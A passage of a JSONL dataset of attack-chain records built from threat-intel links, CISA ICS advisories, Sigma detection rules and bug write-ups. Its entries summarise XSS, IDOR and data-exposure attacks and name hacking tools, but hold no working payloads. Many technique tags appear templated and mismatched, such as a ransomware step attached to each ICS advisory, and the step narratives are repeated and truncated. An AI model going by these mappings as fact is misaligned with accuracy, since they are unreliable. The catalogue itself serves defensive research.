"https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/cybersecuritynews_com/dolby-codec-android-vulnerability/link.md", "retrieved_at": "2026-07-10T13:13:26.161055+00:00", "license": "", "lang": "en"}} {"chain_id": "092ad864f29ec18e4533463c7dd28d8b", "source_id": "redstack_vault_chains", "external_id": "ac-nextcloud-logo-xss-231524", "title": "ac-nextcloud-logo-xss-231524", "description": "An attack chain exploiting the lack of file validation in Nextcloud Server v12.0.0's logo upload function to inject HTML and achieve limited stored XSS in Internet Explorer 11, enabling potential session hijacking or CSRF bypass for admin users targeting other IE11 users.", "steps": [{"order": 1, "label": "Create-Malicious-HTML-Payload-for-Nextcloud-Logo", "narrative": "An attack chain exploiting the lack of file validation in Nextcloud Server v12.0.0's logo upload function to inject HTML and achieve limited stored XSS in Internet Explorer 11, enabling potential session hijacking or CSRF bypass for admin users targeting other IE11 users.", "mitre_attack": [{"technique_id": "T1204.002"}]}, {"order": 2, "label": "Upload-Arbitrary-HTML-as-Site-Logo-in-Nextcloud", "narrative": "An attack chain exploiting the lack of file validation in Nextcloud Server v12.0.0's logo upload function to inject HTML and achieve limited stored XSS in Internet Explorer 11, enabling potential session hijacking or CSRF bypass for admin users targeting other IE11 users.", "mitre_attack": []}, {"order": 3, "label": "Trigger-Stored-XSS-via-Logo-Endpoint-in-IE11", "narrative": "An attack chain exploiting the lack of file validation in Nextcloud Server v12.0.0's logo upload function to inject HTML and achieve limited stored XSS in Internet Explorer 11, enabling potential session hijacking or CSRF bypass for admin users targeting other IE11 users.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/HTML-Injection-and-Limited-Stored-XSS-via-Logo-Upload-in-Nextcloud.md", "retrieved_at": "2026-07-10T14:14:21.380465+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "758671a5bb4983a8c4e0af1f5eb78ef9", "source_id": "misp_galaxy_relations", "external_id": "894a8613-cf12-48b3-8e57-9085f54aa0c3", "title": "Potential Base64 Encoded User-Agent", "description": "Potential Base64 Encoded User-Agent", "steps": [{"order": 1, "label": "Technique T1071.001", "narrative": "Florian Roth (Nextron Systems), Brian Ingram (update) 2022-07-08 ['Unknown'] proxy_ua_susp_base64.yml medium proxy No established product ['https://deviceatlas.com/blog/list-of-user-agent-strings#desktop', 'https://blogs.jpcert.or.jp/en/2022/07/yamabot.html', 'https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp_base64.yml'] ['attack.command-and-control', 'attack.t107", "mitre_attack": [{"technique_id": "T1071.001"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/sigma-rules.json", "retrieved_at": "2026-07-10T11:21:51.349530+00:00", "license": "", "lang": "en"}, "actor": {"name": "Potential Base64 Encoded User-Agent", "aliases": []}} {"chain_id": "fe3348eefe4477da75525cfcae03e10b", "source_id": "cisa_aa_catalog", "external_id": "ICSA-21-259-01", "title": "Siemens RUGGEDCOM ROX (Update A)", "description": "Siemens RUGGEDCOM ROX (Update A)", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "Siemens RUGGEDCOM ROX (Update A): Siemens RUGGEDCOM ROX (Update A)\nMultiple vulnerabilities in RUGGEDCOM ROX devices have been detected, ranging from command injection to filesystem traversal. An attacker could exploit these to gain r", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "Siemens RUGGEDCOM ROX (Update A): Siemens RUGGEDCOM ROX (Update A)\nMultiple vulnerabilities in RUGGEDCOM ROX devices have been detected, ranging from command injection to filesystem traversal. An attacker could exploit these to gain r", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "Siemens RUGGEDCOM ROX (Update A): Siemens RUGGEDCOM ROX (Update A)\nMultiple vulnerabilities in RUGGEDCOM ROX devices have been detected, ranging from command injection to filesystem traversal. An attacker could exploit these to gain r", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "Siemens RUGGEDCOM ROX (Update A): Siemens RUGGEDCOM ROX (Update A)\nMultiple vulnerabilities in RUGGEDCOM ROX devices have been detected, ranging from command injection to filesystem traversal. An attacker could exploit these to gain r", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "Siemens RUGGEDCOM ROX (Update A): Siemens RUGGEDCOM ROX (Update A)\nMultiple vulnerabilities in RUGGEDCOM ROX devices have been detected, ranging from command injection to filesystem traversal. An attacker could exploit these to gain r", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-21-259-01", "retrieved_at": "2026-07-09T14:00:15.809647+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "0099f80fd3557dd6048c6eaf0f680650", "source_id": "cisa_aa_catalog", "external_id": "ICSA-12-102-02", "title": "Koyo Ecom Modules Vulnerabilities", "description": "Koyo Ecom Modules Vulnerabilities", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "Koyo Ecom Modules Vulnerabilities: Koyo Ecom Modules Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "Koyo Ecom Modules Vulnerabilities: Koyo Ecom Modules Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "Koyo Ecom Modules Vulnerabilities: Koyo Ecom Modules Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "Koyo Ecom Modules Vulnerabilities: Koyo Ecom Modules Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "Koyo Ecom Modules Vulnerabilities: Koyo Ecom Modules Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-12-102-02", "retrieved_at": "2026-07-09T14:00:15.744970+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "44a41bf293fbd5cb45d5980208362103", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/asec_ahnlab_com/en_81836/link.md", "title": "en_81836", "description": "en_81836", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://asec.ahnlab.com/en/81836/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://asec.ahnlab.com/en/81836/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://asec.ahnlab.com/en/81836/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/asec_ahnlab_com/en_81836/link.md", "retrieved_at": "2026-07-10T12:18:59.824145+00:00", "license": "", "lang": "en"}} {"chain_id": "fb2676567375cfd6d8de95ef32f5fe3e", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/cybersecuritynews_com/building-a-soc/link.md", "title": "building-a-soc", "description": "building-a-soc", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://cybersecuritynews.com/building-a-soc/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://cybersecuritynews.com/building-a-soc/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://cybersecuritynews.com/building-a-soc/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/cybersecuritynews_com/building-a-soc/link.md", "retrieved_at": "2026-07-10T13:13:07.195894+00:00", "license": "", "lang": "en"}} {"chain_id": "cb6426b13521d6c2a5b5b5249a91fc31", "source_id": "cisa_aa_catalog", "external_id": "ICSA-23-264-05", "title": "Rockwell Automation Connected Components Workbench", "description": "Rockwell Automation Connected Components Workbench", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "Rockwell Automation Connected Components Workbench: Rockwell Automation Connected Components Workbench\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Se", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "Rockwell Automation Connected Components Workbench: Rockwell Automation Connected Components Workbench\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Se", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "Rockwell Automation Connected Components Workbench: Rockwell Automation Connected Components Workbench\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Se", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "Rockwell Automation Connected Components Workbench: Rockwell Automation Connected Components Workbench\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Se", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "Rockwell Automation Connected Components Workbench: Rockwell Automation Connected Components Workbench\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Se", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-264-05", "retrieved_at": "2026-07-09T14:00:15.817364+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "e6e76e75585fab00292f984fac340a80", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/attack_mitre_org/groups_G1023/link.md", "title": "groups_G1023", "description": "groups_G1023", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://attack.mitre.org/groups/G1023)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://attack.mitre.org/groups/G1023)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://attack.mitre.org/groups/G1023)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/attack_mitre_org/groups_G1023/link.md", "retrieved_at": "2026-07-10T12:19:37.148549+00:00", "license": "", "lang": "en"}} {"chain_id": "8f3c59431e0a414c4ec21b4857219475", "source_id": "google_project_zero", "external_id": "https://projectzero.google/2026/01/sound-barrier-2.html", "title": "Breaking the Sound Barrier, Part II: Exploiting CVE-2024-54529", "description": "Breaking the Sound Barrier, Part II: Exploiting CVE-2024-54529", "steps": [{"order": 1, "label": "Technique T1068", "narrative": "In the first part of this series, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (CVE-2024-...\nBreaking the Sound Barrier, Part II: Exploiting CVE-2024-54529\n2026-Jan-30\nDillon Franke, Google Information Security Engineering, 20% time on Project Zero\nIn the\nfirst part of this series\n, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (\nCVE-2024-54529\n) and a double-free vulnerability (\nCVE-2025-31235\n) in the\ncoreaudiod\nsystem daemon through a process I call\nknowledge-driven fuzzing\n. While the first post focused on the process of finding the vulnerabilities, this post dives into the intricate process of exploiting the type confusion vulnerability.\nI’ll explain ", "mitre_attack": [{"technique_id": "T1068"}]}, {"order": 2, "label": "Technique T1190", "narrative": "In the first part of this series, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (CVE-2024-...\nBreaking the Sound Barrier, Part II: Exploiting CVE-2024-54529\n2026-Jan-30\nDillon Franke, Google Information Security Engineering, 20% time on Project Zero\nIn the\nfirst part of this series\n, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (\nCVE-2024-54529\n) and a double-free vulnerability (\nCVE-2025-31235\n) in the\ncoreaudiod\nsystem daemon through a process I call\nknowledge-driven fuzzing\n. While the first post focused on the process of finding the vulnerabilities, this post dives into the intricate process of exploiting the type confusion vulnerability.\nI’ll explain ", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Technique T1204.002", "narrative": "In the first part of this series, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (CVE-2024-...\nBreaking the Sound Barrier, Part II: Exploiting CVE-2024-54529\n2026-Jan-30\nDillon Franke, Google Information Security Engineering, 20% time on Project Zero\nIn the\nfirst part of this series\n, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (\nCVE-2024-54529\n) and a double-free vulnerability (\nCVE-2025-31235\n) in the\ncoreaudiod\nsystem daemon through a process I call\nknowledge-driven fuzzing\n. While the first post focused on the process of finding the vulnerabilities, this post dives into the intricate process of exploiting the type confusion vulnerability.\nI’ll explain ", "mitre_attack": [{"technique_id": "T1204.002"}]}], "provenance": {"url": "https://projectzero.google/2026/01/sound-barrier-2.html", "retrieved_at": "2026-07-09T20:03:01.612837+00:00", "license": "", "lang": "en"}} {"chain_id": "b9bd260b9ce5dceb7d120866a7f095cc", "source_id": "redstack_vault_chains", "external_id": "6ecf4f77-c40e-42bd-a6c6-3defe2dff222", "title": "6ecf4f77-c40e-42bd-a6c6-3defe2dff222", "description": "A multi-stage attack exploiting a reflected XSS vulnerability in Atlassian Confluence's labels feature to execute arbitrary JavaScript and steal session cookies.", "steps": [{"order": 1, "label": "Create-Account-on-TopCoder-Platform", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Atlassian Confluence's labels feature to execute arbitrary JavaScript and steal session cookies.", "mitre_attack": []}, {"order": 2, "label": "Exploit-XSS-in-Confluence-Labels-Endpoint", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Atlassian Confluence's labels feature to execute arbitrary JavaScript and steal session cookies.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Reflected-XSS-in-Confluence-Labels-Endpoint-via-CVE-2018-5230.md", "retrieved_at": "2026-07-10T14:16:55.922127+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "31c57c2aae06e3543253d0e58116d9ae", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/community_riskiq_com/article_7251b15c/link.md", "title": "article_7251b15c", "description": "article_7251b15c", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://community.riskiq.com/article/7251b15c)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://community.riskiq.com/article/7251b15c)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://community.riskiq.com/article/7251b15c)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/community_riskiq_com/article_7251b15c/link.md", "retrieved_at": "2026-07-10T13:12:00.499945+00:00", "license": "", "lang": "en"}} {"chain_id": "a798d2963b8128b98446ee5a0d499c22", "source_id": "splunk_attack_data_scenarios", "external_id": "datasets/suspicious_behaviour/windows_lolbas_risk/replay_old.yml", "title": "replay_old", "description": "replay_old", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "splunk:\n # connects to host on port 8089 make sure you have access to <host>:8089\n host: localhost\n username: admin\n password: changeme\n\ndatasets:\n#name of data set to replay\n- name: CMD Carry Out String Command Parameter\n# relative path of raw file\n path: /home/jhernandez/splunk/attack_data/datasets/suspicious_behaviour/windows_lolbas_risk/lolbin_cmdcarry.log\n replay_parameters:\n source: BA - CMD Carry Out String Command Parameter - Rule\n sourcetype: stash\n index: risk\n # updates timestamp of the dataset to current time.\n # update_timestamp: True\n enabled: True\n\n- name: Detect HTML Help URL in Command Line\n# relative path of raw file\n path: /home/jhernandez/splunk/attack_data/datasets/suspicious_behaviour/windows_lolbas_risk/lolbin_html_help.log\n replay_parameters:", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "splunk:\n # connects to host on port 8089 make sure you have access to <host>:8089\n host: localhost\n username: admin\n password: changeme\n\ndatasets:\n#name of data set to replay\n- name: CMD Carry Out String Command Parameter\n# relative path of raw file\n path: /home/jhernandez/splunk/attack_data/datasets/suspicious_behaviour/windows_lolbas_risk/lolbin_cmdcarry.log\n replay_parameters:\n source: BA - CMD Carry Out String Command Parameter - Rule\n sourcetype: stash\n index: risk\n # updates timestamp of the dataset to current time.\n # update_timestamp: True\n enabled: True\n\n- name: Detect HTML Help URL in Command Line\n# relative path of raw file\n path: /home/jhernandez/splunk/attack_data/datasets/suspicious_behaviour/windows_lolbas_risk/lolbin_html_help.log\n replay_parameters:", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "splunk:\n # connects to host on port 8089 make sure you have access to <host>:8089\n host: localhost\n username: admin\n password: changeme\n\ndatasets:\n#name of data set to replay\n- name: CMD Carry Out String Command Parameter\n# relative path of raw file\n path: /home/jhernandez/splunk/attack_data/datasets/suspicious_behaviour/windows_lolbas_risk/lolbin_cmdcarry.log\n replay_parameters:\n source: BA - CMD Carry Out String Command Parameter - Rule\n sourcetype: stash\n index: risk\n # updates timestamp of the dataset to current time.\n # update_timestamp: True\n enabled: True\n\n- name: Detect HTML Help URL in Command Line\n# relative path of raw file\n path: /home/jhernandez/splunk/attack_data/datasets/suspicious_behaviour/windows_lolbas_risk/lolbin_html_help.log\n replay_parameters:", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/splunk/attack_data/tree/master/datasets/suspicious_behaviour/windows_lolbas_risk/replay_old.yml", "retrieved_at": "2026-07-10T11:40:22.803727+00:00", "license": "Apache-2.0", "lang": "en"}} {"chain_id": "d106c93d06730c6d92fa229c49e3149d", "source_id": "redstack_vault_chains", "external_id": "ac-idor-exness-stats-001", "title": "ac-idor-exness-stats-001", "description": "Multi-stage attack exploiting Insecure Direct Object Reference (IDOR) in Exness Personal Area API to unauthorizedly access trading statistics like equity, net profit, orders, and volumes for any MetaTrader account.", "steps": [{"order": 1, "label": "Login-to-Exness-Personal-Area-and-Identify-Endpoints", "narrative": "Multi-stage attack exploiting Insecure Direct Object Reference (IDOR) in Exness Personal Area API to unauthorizedly access trading statistics like equity, net profit, orders, and volumes for any MetaTrader account.", "mitre_attack": []}, {"order": 2, "label": "Exploit-IDOR-in-Exness-Stats-API", "narrative": "Multi-stage attack exploiting Insecure Direct Object Reference (IDOR) in Exness Personal Area API to unauthorizedly access trading statistics like equity, net profit, orders, and volumes for any MetaTrader account.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/IDOR-in-Exness-Stats-API-to-Access-Unauthorized-MT-Account-Trading-Data.md", "retrieved_at": "2026-07-10T14:14:46.926724+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "efa5cca7ea4e63912e59c0ccf6dca803", "source_id": "misp_galaxy_relations", "external_id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "title": "HackTool - CACTUSTORCH Remote Thread Creation", "description": "HackTool - CACTUSTORCH Remote Thread Creation", "steps": [{"order": 1, "label": "Technique T1055.012", "narrative": "@SBousseaden (detection), Thomas Patzke (rule) 2019-02-01 ['Unknown'] create_remote_thread_win_hktl_cactustorch.yml high create_remote_thread windows ['https://twitter.com/SBousseaden/status/1090588499517079552', 'https://github.com/mdsecactivebreach/CACTUSTORCH', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml'] ['atta", "mitre_attack": [{"technique_id": "T1055.012"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}, {"order": 2, "label": "Technique T1059.005", "narrative": "@SBousseaden (detection), Thomas Patzke (rule) 2019-02-01 ['Unknown'] create_remote_thread_win_hktl_cactustorch.yml high create_remote_thread windows ['https://twitter.com/SBousseaden/status/1090588499517079552', 'https://github.com/mdsecactivebreach/CACTUSTORCH', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml'] ['atta", "mitre_attack": [{"technique_id": "T1059.005"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}, {"order": 3, "label": "Technique T1059.007", "narrative": "@SBousseaden (detection), Thomas Patzke (rule) 2019-02-01 ['Unknown'] create_remote_thread_win_hktl_cactustorch.yml high create_remote_thread windows ['https://twitter.com/SBousseaden/status/1090588499517079552', 'https://github.com/mdsecactivebreach/CACTUSTORCH', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml'] ['atta", "mitre_attack": [{"technique_id": "T1059.007"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}, {"order": 4, "label": "Technique T1218.005", "narrative": "@SBousseaden (detection), Thomas Patzke (rule) 2019-02-01 ['Unknown'] create_remote_thread_win_hktl_cactustorch.yml high create_remote_thread windows ['https://twitter.com/SBousseaden/status/1090588499517079552', 'https://github.com/mdsecactivebreach/CACTUSTORCH', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml'] ['atta", "mitre_attack": [{"technique_id": "T1218.005"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/sigma-rules.json", "retrieved_at": "2026-07-10T11:21:51.135419+00:00", "license": "", "lang": "en"}, "actor": {"name": "HackTool - CACTUSTORCH Remote Thread Creation", "aliases": []}} {"chain_id": "7aa66c0818c5bf258104bada6ba28057", "source_id": "redstack_vault_chains", "external_id": "53f19565-042e-4db3-9d57-02832acc8c5d", "title": "53f19565-042e-4db3-9d57-02832acc8c5d", "description": "An attack chain exploiting insecure storage of an access log file containing PII, accessible via a public URL without authentication on a visitor management system.", "steps": [{"order": 1, "label": "Identify-Exposed-Access-Log-URL", "narrative": "An attack chain exploiting insecure storage of an access log file containing PII, accessible via a public URL without authentication on a visitor management system.", "mitre_attack": []}, {"order": 2, "label": "Access-and-Retrieve-Sensitive-Log-Contents", "narrative": "An attack chain exploiting insecure storage of an access log file containing PII, accessible via a public URL without authentication on a visitor management system.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Massive-PII-Leakage-via-Exposed-Access-Log-in-Visitor-Management-System.md", "retrieved_at": "2026-07-10T14:15:32.809381+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "1db309e7ee94c3195a54276d31939faf", "source_id": "redstack_vault_chains", "external_id": "ac-uber-domxss-prettyphoto", "title": "ac-uber-domxss-prettyphoto", "description": "Exploits a DOM-based XSS vulnerability in the prettyPhoto plugin on eng.uber.com by manipulating URL hashes to inject and execute JavaScript payloads cross-browser.", "steps": [{"order": 1, "label": "Access-Vulnerable-Uber-Engineering-Subdomain", "narrative": "Exploits a DOM-based XSS vulnerability in the prettyPhoto plugin on eng.uber.com by manipulating URL hashes to inject and execute JavaScript payloads cross-browser.", "mitre_attack": []}, {"order": 2, "label": "Inject-Firefox-XSS-Payload-via-URL-Hash", "narrative": "Exploits a DOM-based XSS vulnerability in the prettyPhoto plugin on eng.uber.com by manipulating URL hashes to inject and execute JavaScript payloads cross-browser.", "mitre_attack": []}, {"order": 3, "label": "Inject-Chrome-IE-XSS-Payload-via-URL-Hash", "narrative": "Exploits a DOM-based XSS vulnerability in the prettyPhoto plugin on eng.uber.com by manipulating URL hashes to inject and execute JavaScript payloads cross-browser.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/DOM-based-XSS-in-prettyPhoto-Plugin-via-URL-Hash-Manipulation.md", "retrieved_at": "2026-07-10T14:13:27.851642+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "df7de602a2bfbb61dfc38a7a9a25f40c", "source_id": "mitre_attack_procedure_examples", "external_id": "T1150", "title": "Plist Modification", "description": "Plist Modification", "steps": [{"order": 1, "label": "Technique T1204.002", "narrative": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mecha", "mitre_attack": [{"technique_id": "T1204.002"}]}, {"order": 2, "label": "Technique T1547", "narrative": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mecha", "mitre_attack": [{"technique_id": "T1547"}]}], "provenance": {"url": "https://attack.mitre.org/techniques/T1150", "retrieved_at": "2026-07-10T14:11:04.886684+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "8ece3175e52a7e876c77530cab17291e", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/blogs_jpcert_or_jp/en_2020_12_quasar-family_html/link.md", "title": "en_2020_12_quasar-family_html", "description": "en_2020_12_quasar-family_html", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/blogs_jpcert_or_jp/en_2020_12_quasar-family_html/link.md", "retrieved_at": "2026-07-10T13:10:56.921078+00:00", "license": "", "lang": "en"}} {"chain_id": "9098b154b6cc5556963b31a6769b9dd6", "source_id": "cisa_aa_catalog", "external_id": "ICSA-22-081-01", "title": "Delta Electronics DIAEnergie (Update C)", "description": "Delta Electronics DIAEnergie (Update C)", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "Delta Electronics DIAEnergie (Update C): Delta Electronics DIAEnergie (Update C)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CI", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "Delta Electronics DIAEnergie (Update C): Delta Electronics DIAEnergie (Update C)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CI", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "Delta Electronics DIAEnergie (Update C): Delta Electronics DIAEnergie (Update C)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CI", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "Delta Electronics DIAEnergie (Update C): Delta Electronics DIAEnergie (Update C)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CI", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "Delta Electronics DIAEnergie (Update C): Delta Electronics DIAEnergie (Update C)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CI", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-081-01", "retrieved_at": "2026-07-09T14:00:15.811019+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "c6a8c52e7b725cdbc0d4853ae94ae6a0", "source_id": "misp_galaxy_relations", "external_id": "058f4380-962d-40a5-afce-50207d36d7e2", "title": "HackTool - CrackMapExec Execution Patterns", "description": "HackTool - CrackMapExec Execution Patterns", "steps": [{"order": 1, "label": "Technique T1047", "narrative": "Thomas Patzke 2020-05-22 ['Unknown'] proc_creation_win_hktl_crackmapexec_execution_patterns.yml high process_creation windows ['https://github.com/byt3bl33d3r/CrackMapExec', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml'] ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1047'", "mitre_attack": [{"technique_id": "T1047"}], 